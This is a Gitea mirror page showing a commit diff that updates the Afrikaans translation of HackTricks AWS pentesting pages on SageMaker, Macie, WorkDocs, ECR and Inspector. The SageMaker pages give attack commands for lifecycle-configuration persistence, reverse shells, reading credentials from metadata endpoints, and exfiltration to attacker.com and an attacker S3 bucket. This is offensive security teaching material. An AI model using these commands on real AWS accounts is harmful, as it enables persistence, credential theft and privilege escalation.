gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-30 14:40:37 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-ci-cd/ansible-tower-awx-automation-controlle

Browse Source
This commit is contained in:
Translator
2025-08-01 10:13:33 +00:00
parent a4d144f066
commit f40126626c
47 changed files with 558 additions and 371 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
src/pentesting-cloud/aws-security/aws-persistence/README.md
View File

@@ -1 +1,3 @@
# AWS - Volharding
{{#include ../../../banners/hacktricks-training.md}}

24
src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md
View File

@@ -1,12 +1,14 @@
# AWS - SageMaker Levensiklus Konfigurasie Volharding
# Aws Sagemaker Persistence
{{#include ../../../banners/hacktricks-training.md}}
## Oorsig van Volhardingstegnieke
Hierdie afdeling skets metodes om volharding in SageMaker te verkry deur gebruik te maak van Levensiklus Konfigurasies (LCCs), insluitend omgekeerde shelle, cron take, geloofsbriefdiefstal via IMDS, en SSH agterdeure. Hierdie skripte loop met die instance se IAM rol en kan oor herlaaiings volhard. Meeste tegnieke vereis uitgaande netwerktoegang, maar die gebruik van dienste op die AWS kontrolevlak kan steeds sukses toelaat as die omgewing in 'VPC-slegs' modus is.
#### Nota: SageMaker notaboek instansies is in wese bestuurde EC2 instansies wat spesifiek vir masjienleer werklas geconfigureer is.
#### Nota: SageMaker-notebookinstansies is in wese bestuurde EC2-instanies wat spesifiek vir masjienleer werklas geconfigureer is.
## Vereiste Toestemmings
* Notaboek Instansies:
* Notebook Instansies:
```
sagemaker:CreateNotebookInstanceLifecycleConfig
sagemaker:UpdateNotebookInstanceLifecycleConfig
@@ -38,11 +40,11 @@ aws sagemaker update-notebook-instance \
--notebook-instance-name victim-instance \
--lifecycle-config-name attacker-lcc
```
## Stel Levensikluskonfigurasie in op SageMaker Studio
## Stel Levensiklus Konfigurasie in op SageMaker Studio
Levensikluskonfigurasies kan op verskillende vlakke en aan verskillende app-tipes binne SageMaker Studio geheg word.
Levensiklus Konfigurasies kan op verskillende vlakke en aan verskillende app tipes binne SageMaker Studio geheg word.
### Studio Domeinvlak (Alle Gebruikers)
### Studio Domein Vlak (Alle Gebruikers)
```bash
# Create Studio Lifecycle Configuration*
@@ -74,8 +76,8 @@ aws sagemaker update-space --domain-id <DOMAIN_ID> --space-name <SPACE_NAME> --s
Levensiklus konfigurasies kan spesifiek toegepas word op verskillende SageMaker Studio toepassingstipes:
* JupyterServer: Voer skripte uit tydens Jupyter bediener opstart, ideaal vir volhardingsmeganismes soos omgekeerde skale en cron take.
* KernelGateway: Voer uit tydens die kern poorttoepassing bekendstelling, nuttig vir aanvanklike opstelling of volhoubare toegang.
* CodeEditor: Geld vir die Kode Redigeerder (Code-OSS), wat skripte moontlik maak wat by die begin van kode redigeersessies uitgevoer word.
* KernelGateway: Voer uit tydens kern poorttoepassing bekendstelling, nuttig vir aanvanklike opstelling of volhoubare toegang.
* CodeEditor: Toegepas op die Kode Redigeerder (Code-OSS), wat skripte moontlik maak wat tydens die begin van kode redigeersessies uitgevoer word.
### Voorbeeld Opdrag vir Elke Tipe:
@@ -101,13 +103,13 @@ aws sagemaker create-studio-lifecycle-config \
--studio-lifecycle-config-content $(base64 -w0 editor_persist.sh)
```
### Kritieke Inligting:
* Die aanhegting van LCC's op die domein- of ruimtevlak beïnvloed alle gebruikers of toepassings binne die omvang.
* Die aanhegting van LCCs op die domein- of ruimtevlak beïnvloed alle gebruikers of toepassings binne die omvang.
* Vereis hoër toestemmings (sagemaker:UpdateDomain, sagemaker:UpdateSpace) wat tipies meer haalbaar is op ruimtevlak as op domeinvlak.
* Netwerkvlakbeheer (bv. streng uitgangsfiltrering) kan suksesvolle omgekeerde skale of data-uitvloeiing voorkom.
## Omgekeerde Skaal via Levensiklus Konfigurasie
SageMaker Levensiklus Konfigurasies (LCC's) voer pasgemaakte skripte uit wanneer notaboekinstansies begin. 'n Aanvaller met toestemmings kan 'n volgehoue omgekeerde skaal tot stand bring.
SageMaker Levensiklus Konfigurasies (LCCs) voer pasgemaakte skripte uit wanneer notaboekinstansies begin. 'n Aanvaller met toestemmings kan 'n volgehoue omgekeerde skaal tot stand bring.
### Payload Voorbeeld:
```
@@ -153,4 +155,4 @@ aws s3 cp /tmp/creds.json $ATTACKER_BUCKET/$(hostname)-creds.json
curl -X POST -F "file=@/tmp/creds.json" http://attacker.com/upload
```
{{#include ../../../banners/hacktricks-training.md}}

4
src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
View File

@@ -1 +1,3 @@
# AWS - Post Exploitatie
# AWS - Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}

9
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.md
View File

@@ -14,7 +14,7 @@ Vir meer inligting oor Macie, kyk:
AWS Macie is 'n sekuriteitsdiens wat outomaties sensitiewe data binne AWS-omgewings opspoor, soos geloofsbriewe, persoonlik identifiseerbare inligting (PII), en ander vertroulike data. Wanneer Macie 'n sensitiewe geloofsbrief identifiseer, soos 'n AWS geheime sleutel wat in 'n S3-bucket gestoor is, genereer dit 'n bevinding wat die eienaar toelaat om 'n "monster" van die opgespoorde data te sien. Gewoonlik, sodra die sensitiewe lêer uit die S3-bucket verwyder is, word verwag dat die geheim nie weer verkry kan word nie.
Daar is egter 'n **bypass** geïdentifiseer waar 'n aanvaller met voldoende regte 'n **lêer met dieselfde naam** kan **heroplaai** maar met verskillende, nie-sensitiewe dummy data. Dit laat Macie toe om die nuut opgelaaide lêer met die oorspronklike bevinding te assosieer, wat die aanvaller in staat stel om die **"Reveal Sample" kenmerk** te gebruik om die voorheen opgespoorde geheim te onttrek. Hierdie probleem stel 'n beduidende sekuriteitsrisiko voor, aangesien geheime wat veronderstel was om verwyder te wees, steeds deur hierdie metode verkrybaar bly.
Daar is egter 'n **bypass** geïdentifiseer waar 'n aanvaller met voldoende regte 'n **lêer met dieselfde naam** kan **heroplaai** maar met verskillende, nie-sensitiewe dummy data. Dit veroorsaak dat Macie die nuut opgelaaide lêer met die oorspronklike bevinding assosieer, wat die aanvaller in staat stel om die **"Reveal Sample" funksie** te gebruik om die voorheen opgespoorde geheim te onttrek. Hierdie probleem stel 'n beduidende sekuriteitsrisiko voor, aangesien geheime wat veronderstel was om verwyder te wees, steeds deur hierdie metode verkrybaar bly.
![flow](https://github.com/user-attachments/assets/7b83f2d3-1690-41f1-98cc-05ccd0154a66)
@@ -22,7 +22,7 @@ Daar is egter 'n **bypass** geïdentifiseer waar 'n aanvaller met voldoende regt
1. Laai 'n lêer op (bv. `test-secret.txt`) na 'n S3-bucket met sensitiewe data, soos 'n AWS geheime sleutel. Wag vir AWS Macie om te skandeer en 'n bevinding te genereer.
2. Navigeer na AWS Macie Findings, vind die gegenereerde bevinding, en gebruik die **Reveal Sample** kenmerk om die opgespoorde geheim te sien.
2. Navigeer na AWS Macie Findings, vind die gegenereerde bevinding, en gebruik die **Reveal Sample** funksie om die opgespoorde geheim te sien.
3. Verwyder `test-secret.txt` uit die S3-bucket en verifieer dat dit nie meer bestaan nie.
@@ -30,8 +30,9 @@ Daar is egter 'n **bypass** geïdentifiseer waar 'n aanvaller met voldoende regt
5. Keer terug na AWS Macie Findings, toegang die oorspronklike bevinding, en klik weer op **Reveal Sample**.
6. Observeer dat Macie steeds die oorspronklike geheim onthul, ten spyte daarvan dat die lêer verwyder is en vervang is met verskillende inhoud **van verskillende rekeninge, in ons geval sal dit die aanvaller se rekening wees**.
6. Observeer dat Macie steeds die oorspronklike geheim onthul, ten spyte van die lêer wat verwyder en met verskillende inhoud **van verskillende rekeninge, in ons geval sal dit die aanvaller se rekening wees**.
**Samevatting:**
Hierdie kwesbaarheid laat 'n aanvaller met voldoende AWS IAM-regte toe om voorheen opgespoorde geheime te herstel, selfs nadat die oorspronklike lêer uit S3 verwyder is. As 'n AWS geheime sleutel, toegangstoken, of ander sensitiewe geloofsbrief blootgestel word, kan 'n aanvaller hierdie fout benut om dit te verkry en ongeoorloofde toegang tot AWS-hulpbronne te verkry. Dit kan lei tot regte-eskalasie, ongeoorloofde data-toegang, of verdere kompromie van wolk bates, wat lei tot datalekke en diensonderbrekings.
Hierdie kwesbaarheid stel 'n aanvaller met voldoende AWS IAM-regte in staat om voorheen opgespoorde geheime te herstel, selfs nadat die oorspronklike lêer uit S3 verwyder is. As 'n AWS geheime sleutel, toegangstoken, of ander sensitiewe geloofsbrief blootgestel word, kan 'n aanvaller hierdie fout benut om dit te verkry en onbevoegde toegang tot AWS-hulpbronne te verkry. Dit kan lei tot regte-eskalasie, onbevoegde data-toegang, of verdere kompromie van wolk bates, wat lei tot datalekke en diensonderbrekings.
{{#include ../../../banners/hacktricks-training.md}}

18
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
View File

@@ -1,8 +1,10 @@
# AWS - Sagemaker Privesc
{{#include ../../../banners/hacktricks-training.md}}
## AWS - Sagemaker Privesc
{{#include ../../../banners/hacktricks-training.md}}
### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl`
@@ -12,12 +14,12 @@ aws sagemaker create-notebook-instance --notebook-instance-name example \
--instance-type ml.t2.medium \
--role-arn arn:aws:iam::<account-id>:role/service-role/<role-name>
```
Die antwoord moet 'n `NotebookInstanceArn` veld bevat, wat die ARN van die nuut geskepte notaboekinstansie sal bevat. Ons kan dan die `create-presigned-notebook-instance-url` API gebruik om 'n URL te genereer wat ons kan gebruik om toegang tot die notaboekinstansie te verkry sodra dit gereed is:
Die antwoord moet 'n `NotebookInstanceArn` veld bevat, wat die ARN van die nuut geskepte notaboekinstansie sal bevat. Ons kan dan die `create-presigned-notebook-instance-url` API gebruik om 'n URL te genereer wat ons kan gebruik om toegang te verkry tot die notaboekinstansie sodra dit gereed is:
```bash
aws sagemaker create-presigned-notebook-instance-url \
--notebook-instance-name <name>
```
Navigeer na die URL met die blaaier en klik op \`Open JupyterLab\` in die boonste regterkant, scroll dan af na die “Launcher” tab en onder die “Other” afdeling, klik die “Terminal” knoppie.
Navigeer na die URL met die blaaier en klik op \`Open JupyterLab\` in die boonste regterkant, scroll dan af na die “Launcher” tab en onder die “Other” afdeling, klik op die “Terminal” knoppie.
Nou is dit moontlik om toegang te verkry tot die metadata geloofsbriewe van die IAM Rol.
@@ -25,7 +27,7 @@ Nou is dit moontlik om toegang te verkry tot die metadata geloofsbriewe van die
### `sagemaker:CreatePresignedNotebookInstanceUrl`
As daar Jupyter **notebooks reeds aan die gang is** en jy kan hulle lys met `sagemaker:ListNotebookInstances` (of hulle op enige ander manier ontdek). Jy kan **'n URL vir hulle genereer, toegang tot hulle verkry, en die geloofsbriewe steel soos aangedui in die vorige tegniek**.
As daar Jupyter **notebooks reeds aan die gang is** daarop en jy kan hulle lys met `sagemaker:ListNotebookInstances` (of hulle op enige ander manier ontdek). Jy kan **'n URL vir hulle genereer, toegang tot hulle verkry, en die geloofsbriewe steel soos aangedui in die vorige tegniek**.
```bash
aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name <name>
```
@@ -33,7 +35,7 @@ aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name <n
### `sagemaker:CreateProcessingJob,iam:PassRole`
'n Aanvaller met daardie toestemmings kan **sagemaker 'n verwerkingswerk** laat uitvoer met 'n sagemaker rol wat daaraan geheg is. Die aanvaller kan die definisie van die houer aandui wat in 'n **AWS bestuurde ECS rekening instansie** uitgevoer sal word, en **die geloofsbriewe van die aangehegte IAM rol steel**.
'n Aanvaller met daardie toestemmings kan **sagemaker 'n verwerkingswerk** laat uitvoer met 'n sagemaker rol wat daaraan geheg is. Die aanvaller kan die definisie van die houer aandui wat in 'n **AWS bestuurde ECS rekening instansie** uitgevoer sal word, en **die akrediteer van die IAM rol wat aangeheg is** steel.
```bash
# I uploaded a python docker image to the ECR
aws sagemaker create-processing-job \
@@ -90,12 +92,12 @@ aws sagemaker create-training-job \
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
## Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer
```
**Potensiële Impak:** Privesc na die sagemaker diensrol gespesifiseer.
**Potensiële Impak:** Privesc na die sagemaker diensrol wat gespesifiseer is.
### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`
'n Aanvaller met daardie toestemmings sal (potensieel) in staat wees om 'n **hyperparameter opleidingswerk** te skep, **'n arbitrêre houer** daarop te laat loop met 'n **rol aangeheg** daaraan.\
_Ek het nie uitgebuit nie weens die gebrek aan tyd, maar dit lyk soortgelyk aan die vorige uitbuitings, voel vry om 'n PR met die uitbuitingsbesonderhede te stuur._
'n Aanvaller met daardie toestemmings sal (potensieel) in staat wees om 'n **hyperparameter opleidingswerk** te skep, **met 'n arbitrêre houer** daarop met 'n **rol aangeheg**.\
_Ek het nie uitgebuit nie weens 'n gebrek aan tyd, maar dit lyk soortgelyk aan die vorige uitbuitings, voel vry om 'n PR met die uitbuitingsbesonderhede te stuur._
## Verwysings

11
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md
View File

@@ -1,5 +1,7 @@
# AWS - WorkDocs Privesc
{{#include ../../../banners/hacktricks-training.md}}
## WorkDocs
Vir meer inligting oor WorkDocs, kyk:
@@ -15,7 +17,7 @@ Skep 'n gebruiker binne die aangeduide Directory, dan sal jy toegang hê tot bei
# Create user (created inside the AD)
aws workdocs create-user --username testingasd --given-name testingasd --surname testingasd --password <password> --email-address name@directory.domain --organization-id <directory-id>
```
### `workdocs:GetDocument`, `(workdocs:DescribeActivities)`
### `workdocs:GetDocument`, `(workdocs:DescribeActivities`)`
Die lêers mag sensitiewe inligting bevat, lees hulle:
```bash
@@ -30,7 +32,7 @@ aws workdocs get-document --document-id <doc-id>
```
### `workdocs:AddResourcePermissions`
As jy nie toegang het om iets te lees nie, kan jy dit net toeken.
As jy nie toegang het om iets te lees nie, kan jy dit eenvoudig toeken.
```bash
# Add permission so anyway can see the file
aws workdocs add-resource-permissions --resource-id <id> --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER
@@ -44,3 +46,8 @@ Volg die instruksies van [https://docs.aws.amazon.com/workdocs/latest/adminguide
Teken in met daardie gebruiker in workdoc en toegang die admin paneel in `/workdocs/index.html#/admin`
Ek het nie enige manier gevind om dit vanaf die cli te doen nie.
{{#include ../../../banners/hacktricks-training.md}}

30
src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md
View File

@@ -1,14 +1,12 @@
# AWS - ECR Enum
## AWS - ECR Enum
{{#include ../../../banners/hacktricks-training.md}}
### ECR
## ECR
#### Basiese Inligting
### Basiese Inligting
Amazon **Elastic Container Registry** (Amazon ECR) is 'n **bestuurde houerbeeld registrasiediens**. Dit is ontwerp om 'n omgewing te bied waar kliënte met hul houerbeelde kan interaksie hê deur middel van bekende interfaces. Spesifiek word die gebruik van die Docker CLI of enige verkiesde kliënt ondersteun, wat aktiwiteite soos die stoot, trek en bestuur van houerbeelde moontlik maak.
Amazon **Elastic Container Registry** (Amazon ECR) is 'n **bestuurde houerbeeld registrasiediens**. Dit is ontwerp om 'n omgewing te bied waar kliënte met hul houerbeelde kan interaksie hê deur middel van bekende koppelvlakke. Spesifiek word die gebruik van die Docker CLI of enige verkiesde kliënt ondersteun, wat aktiwiteite soos die stoot, trek en bestuur van houerbeelde moontlik maak.
ECR bestaan uit 2 tipes voorwerpe: **Registries** en **Repositories**.
@@ -20,14 +18,14 @@ Elke AWS-rekening het 2 registries: **Privaat** & **Publiek**.
- **Privaat per standaard**: Die houerbeelde wat in 'n Amazon ECR privaat registry gestoor word, is **slegs toeganklik vir gemagtigde gebruikers** binne jou AWS-rekening of vir diegene aan wie toestemming gegee is.
- Die URI van 'n **privaat repository** volg die formaat `<account_id>.dkr.ecr.<region>.amazonaws.com/<repo-name>`
- **Toegangsbeheer**: Jy kan **toegang beheer** tot jou privaat houerbeelde deur middel van **IAM-beleide**, en jy kan fyn-granige toestemmings op grond van gebruikers of rolle konfigureer.
- **Toegangsbeheer**: Jy kan **toegang** tot jou privaat houerbeelde beheer deur middel van **IAM-beleide**, en jy kan fyn-granige toestemmings op grond van gebruikers of rolle konfigureer.
- **Integrasie met AWS-dienste**: Amazon ECR privaat registries kan maklik **geïntegreer word met ander AWS-dienste**, soos EKS, ECS...
- **Ander privaat registry opsies**:
- Die Tag onveranderlikheid kolom lys sy status, as tag onveranderlikheid geaktiveer is, sal dit **verhoed** dat beeld **stoot** met **bestaande tags** die beelde oorskryf.
- Die Tag onveranderlikheid kolom lys sy status, as tag onveranderlikheid geaktiveer is, sal dit **voorkom** dat beeld **stoot** met **bestaande tags** die beelde oorskryf.
- Die **Enkripsietipe** kolom lys die enkripsie eienskappe van die repository, dit wys die standaard enkripsietipes soos AES-256, of het **KMS** geaktiveerde enkripsies.
- Die **Trek deur cache** kolom lys sy status, as die Trek deur cache status Aktief is, sal dit **repositories in 'n eksterne publieke repository in jou privaat repository** kas.
- Spesifieke **IAM-beleide** kan geconfigureer word om verskillende **toestemmings** te verleen.
- Die **skandeer konfigurasie** laat toe om vir kwesbaarhede in die beelde wat binne die repo gestoor is, te skandeer.
- Die **Trek deur kas** kolom lys sy status, as die Trek deur kas status Aktief is, sal dit **repositories in 'n eksterne publieke repository in jou privaat repository kas**.
- Spesifieke **IAM-beleide** kan gekonfigureer word om verskillende **toestemmings** te verleen.
- Die **skandeer konfigurasie** laat toe om kwesbaarhede in die beelde wat binne die repo gestoor is, te skandeer.
2. **Publieke Registries**:
@@ -47,7 +45,7 @@ Dit is die **beelde** wat in die **privaat registry** of in die **publieke** een
<figure><img src="../../../images/image (280).png" alt=""><figcaption></figcaption></figure>
#### Enumerasie
### Enumerasie
```bash
# Get repos
aws ecr describe-repositories
@@ -67,27 +65,27 @@ aws ecr-public describe-repositories
aws ecr get-registry-policy
aws ecr get-repository-policy --repository-name <repo_name>
```
#### Ongeauthentiseerde Enum
### Ongeauthentiseerde Enum
{{#ref}}
../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md
{{#endref}}
#### Privesc
### Privesc
Op die volgende bladsy kan jy kyk hoe om **ECR-toestemmings te misbruik om voorregte te verhoog**:
In die volgende bladsy kan jy kyk hoe om **ECR-toestemmings te misbruik om voorregte te verhoog**:
{{#ref}}
../aws-privilege-escalation/aws-ecr-privesc.md
{{#endref}}
#### Post Exploitatie
### Post Exploitatie
{{#ref}}
../aws-post-exploitation/aws-ecr-post-exploitation.md
{{#endref}}
#### Volharding
### Volharding
{{#ref}}
../aws-persistence/aws-ecr-persistence.md

2
src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md
View File

@@ -1 +1,3 @@
# AWS - Sekuriteit & Ontdekking Dienste
{{#include ../../../../banners/hacktricks-training.md}}

71
src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md
View File

@@ -1,18 +1,17 @@
# AWS - Inspector Enum
## AWS - Inspector Enum
{{#include ../../../../banners/hacktricks-training.md}}
### Inspector
Amazon Inspector is 'n gevorderde, geoutomatiseerde kwesbaarheidbestuurdiens wat ontwerp is om die sekuriteit van jou AWS-omgewing te verbeter. Hierdie diens skandeer deurlopend Amazon EC2-instances, houerbeelde in Amazon ECR, Amazon ECS, en AWS Lambda-funksies vir kwesbaarhede en onbedoelde netwerkblootstelling. Deur 'n robuuste kwesbaarheidintelligensie-databasis te benut, bied Amazon Inspector gedetailleerde bevindings, insluitend ernsvlaktes en herstelaanbevelings, wat organisasies help om proaktief sekuriteitsrisiko's te identifiseer en aan te spreek. Hierdie omvattende benadering verseker 'n versterkte sekuriteitsposisie oor verskeie AWS-dienste, wat help met nakoming en risiko-bestuur.
## Inspector
Amazon Inspector is 'n gevorderde, outomatiese kwesbaarheidbestuurdiens wat ontwerp is om die sekuriteit van jou AWS-omgewing te verbeter. Hierdie diens skandeer deurlopend Amazon EC2-instanties, houerbeelde in Amazon ECR, Amazon ECS, en AWS Lambda-funksies vir kwesbaarhede en onbedoelde netwerkblootstelling. Deur 'n robuuste kwesbaarheidintelligensiedatabasis te benut, bied Amazon Inspector gedetailleerde bevindings, insluitend ernsvlaktes en herstelaanbevelings, wat organisasies help om proaktief sekuriteitsrisiko's te identifiseer en aan te spreek. Hierdie omvattende benadering verseker 'n versterkte sekuriteitsposisie oor verskeie AWS-dienste, wat help met nakoming en risiko-bestuur.
### Key elements
#### Findings
Bevindings in Amazon Inspector is gedetailleerde verslae oor kwesbaarhede en blootstellings wat tydens die skandering van EC2-instances, ECR-bewaarplekke, of Lambda-funksies ontdek is. Gebaseer op sy toestand, word bevindings gekategoriseer as:
Bevindings in Amazon Inspector is gedetailleerde verslae oor kwesbaarhede en blootstellings wat tydens die skandering van EC2-instanties, ECR-bewaarplekke, of Lambda-funksies ontdek is. Gebaseer op sy toestand, word bevindings gekategoriseer as:
- **Aktief**: Die bevinding is nie herstel nie.
- **Gesluit**: Die bevinding is herstel.
@@ -26,33 +25,33 @@ Bevindings word ook in die volgende drie tipes gekategoriseer:
#### Filters and Suppression Rules
Filters en onderdrukking reëls in Amazon Inspector help om bevindings te bestuur en te prioriseer. Filters laat jou toe om bevindings te verfyn op grond van spesifieke kriteria, soos erns of hulpbron tipe. Onderdrukking reëls laat jou toe om sekere bevindings wat as lae risiko beskou word, wat reeds gemitigeer is, of vir enige ander belangrike rede, te onderdruk, wat voorkom dat hulle jou sekuriteitsverslae oorlaai en jou toelaat om op meer kritieke kwessies te fokus.
Filters en onderdrukking reëls in Amazon Inspector help om bevindings te bestuur en te prioritiseer. Filters laat jou toe om bevindings te verfyn op grond van spesifieke kriteria, soos erns of hulpbron tipe. Onderdrukking reëls laat jou toe om sekere bevindings wat as lae risiko beskou word, wat reeds gemitigeer is, of vir enige ander belangrike rede, te onderdruk, wat voorkom dat hulle jou sekuriteitsverslae oorlaai en jou toelaat om op meer kritieke kwessies te fokus.
#### Software Bill of Materials (SBOM)
'n Software Bill of Materials (SBOM) in Amazon Inspector is 'n uitvoerbare geneste inventarislis wat al die komponente binne 'n sagtewarepakket, insluitend biblioteke en afhanklikhede, in detail uiteensit. SBOMs help om deursigtigheid in die sagtewarevoorsieningsketting te bied, wat beter kwesbaarheidbestuur en nakoming moontlik maak. Hulle is van kardinale belang om risiko's wat verband hou met oopbron- en derdeparty-sagtewarekomponente te identifiseer en te mitigeer.
'n Software Bill of Materials (SBOM) in Amazon Inspector is 'n uitvoerbare geneste inventarislis wat al die komponente binne 'n sagtewarepakket in detail uiteensit, insluitend biblioteke en afhanklikhede. SBOM's help om deursigtigheid in die sagtewarevoorsieningsketting te bied, wat beter kwesbaarheidbestuur en nakoming moontlik maak. Hulle is van kardinale belang om risiko's wat verband hou met oopbron- en derdeparty-sagtewarekomponente te identifiseer en te mitigeer.
### Key features
#### Export findings
Amazon Inspector bied die vermoë om bevindings na Amazon S3 Buckets, Amazon EventBridge en AWS Security Hub te eksporteer, wat jou in staat stel om gedetailleerde verslae van geïdentifiseerde kwesbaarhede en blootstellings vir verdere analise of deel op 'n spesifieke datum en tyd te genereer. Hierdie kenmerk ondersteun verskeie uitvoerformate soos CSV en JSON, wat dit makliker maak om met ander gereedskap en stelsels te integreer. Die uitvoerfunksionaliteit laat aanpassing van die data wat in die verslae ingesluit is toe, wat jou in staat stel om bevindings te filter op grond van spesifieke kriteria soos erns, hulpbron tipe, of datumbereik en sluit standaard al jou bevindings in die huidige AWS Region met 'n Aktiewe status in.
Amazon Inspector bied die vermoë om bevindings na Amazon S3 Buckets, Amazon EventBridge en AWS Security Hub te eksporteer, wat jou in staat stel om gedetailleerde verslae van geïdentifiseerde kwesbaarhede en blootstellings vir verdere analise of deel op 'n spesifieke datum en tyd te genereer. Hierdie funksie ondersteun verskeie uitvoerformate soos CSV en JSON, wat dit makliker maak om met ander gereedskap en stelsels te integreer. Die uitvoerfunksionaliteit laat aanpassing van die data wat in die verslae ingesluit is toe, wat jou in staat stel om bevindings te filter op grond van spesifieke kriteria soos erns, hulpbron tipe, of datumbereik en sluit standaard al jou bevindings in die huidige AWS-streek met 'n Aktiewe status in.
Wanneer bevindings uitgevoer word, is 'n Key Management Service (KMS) sleutel nodig om die data tydens uitvoer te enkripteer. KMS sleutels verseker dat die uitgevoerde bevindings teen ongemagtigde toegang beskerm word, wat 'n ekstra laag van sekuriteit vir sensitiewe kwesbaarheidinligting bied.
Wanneer bevindings uitgevoer word, is 'n Key Management Service (KMS) sleutel nodig om die data tydens uitvoer te enkripteer. KMS sleutels verseker dat die uitgevoerde bevindings teen ongemagtigde toegang beskerm word, wat 'n ekstra laag sekuriteit vir sensitiewe kwesbaarheidinligting bied.
#### Amazon EC2 instances scanning
Amazon Inspector bied robuuste skandeervermoëns vir Amazon EC2-instances om kwesbaarhede en sekuriteitskwessies te detecteer. Inspector het ontginde metadata van die EC2-instance vergelyk met reëls van sekuriteitsadvies om pakketskwesbaarhede en netwerkbereikbaarheidkwessies te produseer. Hierdie skanderings kan uitgevoer word deur **agent-gebaseerde** of **agentlose** metodes, afhangende van die **skandeermodus** instellingskonfigurasie van jou rekening.
Amazon Inspector bied robuuste skandeervermoëns vir Amazon EC2-instanties om kwesbaarhede en sekuriteitskwessies te detecteer. Inspector het onttrokken metadata van die EC2-instantie vergelyk met reëls van sekuriteitsadvies om pakketskwesbaarhede en netwerkbereikbaarheidkwessies te produseer. Hierdie skanderings kan uitgevoer word deur **agent-gebaseerde** of **agentlose** metodes, afhangende van die **skandeermodus** instellingskonfigurasie van jou rekening.
- **Agent-GeBASEER**: Maak gebruik van die AWS Systems Manager (SSM) agent om diepgaande skanderings uit te voer. Hierdie metode laat vir omvattende dataversameling en -analise direk vanaf die instance toe.
- **Agentlose**: Bied 'n liggewig alternatief wat nie die installering van 'n agent op die instance vereis nie, deur 'n EBS-snapshots van elke volume van die EC2-instance te skep, op soek na kwesbaarhede, en dit dan te verwyder; wat bestaande AWS-infrastruktuur vir skandering benut.
- **Agent-GeBASEER**: Gebruik die AWS Systems Manager (SSM) agent om diepgaande skanderings uit te voer. Hierdie metode laat vir omvattende dataversameling en -analise direk vanaf die instantie toe.
- **Agentlose**: Bied 'n liggewig alternatief wat nie die installering van 'n agent op die instantie vereis nie, deur 'n EBS-snapshots van elke volume van die EC2-instantie te skep, op soek na kwesbaarhede, en dit dan te verwyder; benut bestaande AWS-infrastruktuur vir skandering.
Die skandeermodus bepaal watter metode gebruik sal word om EC2-skanderings uit te voer:
- **Agent-GeBASEER**: Betrek die installering van die SSM-agent op EC2-instances vir diep inspeksie.
- **Hibrid Skandering**: Kombineer beide agent-gebaseerde en agentlose metodes om dekking te maksimeer en prestasie-impak te minimaliseer. In daardie EC2-instances waar die SSM-agent geïnstalleer is, sal Inspector 'n agent-gebaseerde skandering uitvoer, en vir diegene waar daar geen SSM-agent is nie, sal die skandering agentloos wees.
- **Agent-GeBASEER**: Betrek die installering van die SSM-agent op EC2-instanties vir diep inspeksie.
- **Hibrid Skandering**: Kombineer beide agent-gebaseerde en agentlose metodes om dekking te maksimeer en prestasie-impak te minimaliseer. In daardie EC2-instanties waar die SSM-agent geïnstalleer is, sal Inspector 'n agent-gebaseerde skandering uitvoer, en vir diegene waar daar geen SSM-agent is nie, sal die skandering agentloos wees.
Nog 'n belangrike kenmerk is die **diepe inspeksie** vir EC2 Linux-instances. Hierdie kenmerk bied deeglike analise van die sagteware en konfigurasie van EC2 Linux-instances, wat gedetailleerde kwesbaarheidbeoordelings bied, insluitend bedryfstelsels kwesbaarhede, toepassings kwesbaarhede, en verkeerde konfigurasies, wat 'n omvattende sekuriteitsbeoordeling verseker. Dit word bereik deur die inspeksie van **aangepaste paaie** en al sy sub-gidse. Standaard sal Amazon Inspector die volgende skandeer, maar elke lidrekening kan tot 5 meer aangepaste paaie definieer, en elke gedelegeerde administrateur tot 10:
Nog 'n belangrike kenmerk is die **diep inspeksie** vir EC2 Linux-instanties. Hierdie kenmerk bied deeglike analise van die sagteware en konfigurasie van EC2 Linux-instanties, wat gedetailleerde kwesbaarheidbeoordelings bied, insluitend bedryfstelsels kwesbaarhede, toepassings kwesbaarhede, en verkeerde konfigurasies, wat 'n omvattende sekuriteitsevaluasie verseker. Dit word bereik deur die inspeksie van **aangepaste paaie** en al sy sub-gidse. Standaard sal Amazon Inspector die volgende skandeer, maar elke lidrekening kan tot 5 meer aangepaste paaie definieer, en elke gedelegeerde administrateur tot 10:
- `/usr/lib`
- `/usr/lib64`
@@ -63,23 +62,23 @@ Nog 'n belangrike kenmerk is die **diepe inspeksie** vir EC2 Linux-instances. Hi
Amazon Inspector bied robuuste skandeervermoëns vir Amazon Elastic Container Registry (ECR) houerbeelde, wat verseker dat pakketskwesbaarhede doeltreffend gedetecteer en bestuur word.
- **Basiese Skandering**: Dit is 'n vinnige en liggewig skandering wat bekende OS-pakketskwesbaarhede in houerbeelde identifiseer deur 'n standaard stel reëls van die oopbron Clair-projek. Met hierdie skandeer konfigurasie, sal jou bewaringe geskanteer word op druk, of deur handmatige skanderings uit te voer.
- **Basiese Skandering**: Dit is 'n vinnige en liggewig skandering wat bekende OS-pakketskwesbaarhede in houerbeelde identifiseer met behulp van 'n standaard stel reëls van die oopbron Clair-projek. Met hierdie skandeer konfigurasie sal jou bewaringe geskandeer word op druk, of deur handmatige skanderings uit te voer.
